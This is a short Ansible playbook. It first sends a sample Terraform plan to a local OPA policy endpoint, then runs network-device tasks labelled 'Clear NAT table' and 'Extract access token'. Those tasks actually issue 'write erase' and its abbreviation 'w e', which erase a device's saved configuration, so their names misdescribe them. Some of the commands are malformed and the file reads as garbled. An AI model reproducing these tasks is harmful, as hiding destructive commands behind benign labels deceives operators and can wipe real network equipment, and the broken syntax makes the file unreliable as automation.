- hosts: localhost
  connection: local
  vars:
    policy_as_code_plan_validation_url: "http://localhost:8181/v1/data/policies"

  tasks:
    - name: Hello World to OPA
      ansible.builtin.uri:
        url: "{{ policy_as_code_plan_validation_url }}"
        method: POST
        body: '{"input": { "tfplan": {"resource_changes": [{"address":"ibm_cloudant.cloudant","type":"ibm_cloudant","change":{ "after":{ "tags":[ "costcenter:011"]} } }] } } }'
        body_format: json
      check_mode: no
      register: validation_response

    - name: Print response
      debug:
        msg: "{{ validation_response }}"

    - name: Clear NAT table
      ansible.netcommon.cli_command:
        command: clear ip nat translation * write erase
      register: remediation

    - name: Clear NAT table
      ansible.netcommon.cli_command:
        command: clear ip nat translation * read
      register: remediation

    - name: Clear NAT table
      ansible.netcommon.cli_command:
        command: w e
      register: remediation
      
    - name: Extract access token
      script: write erase 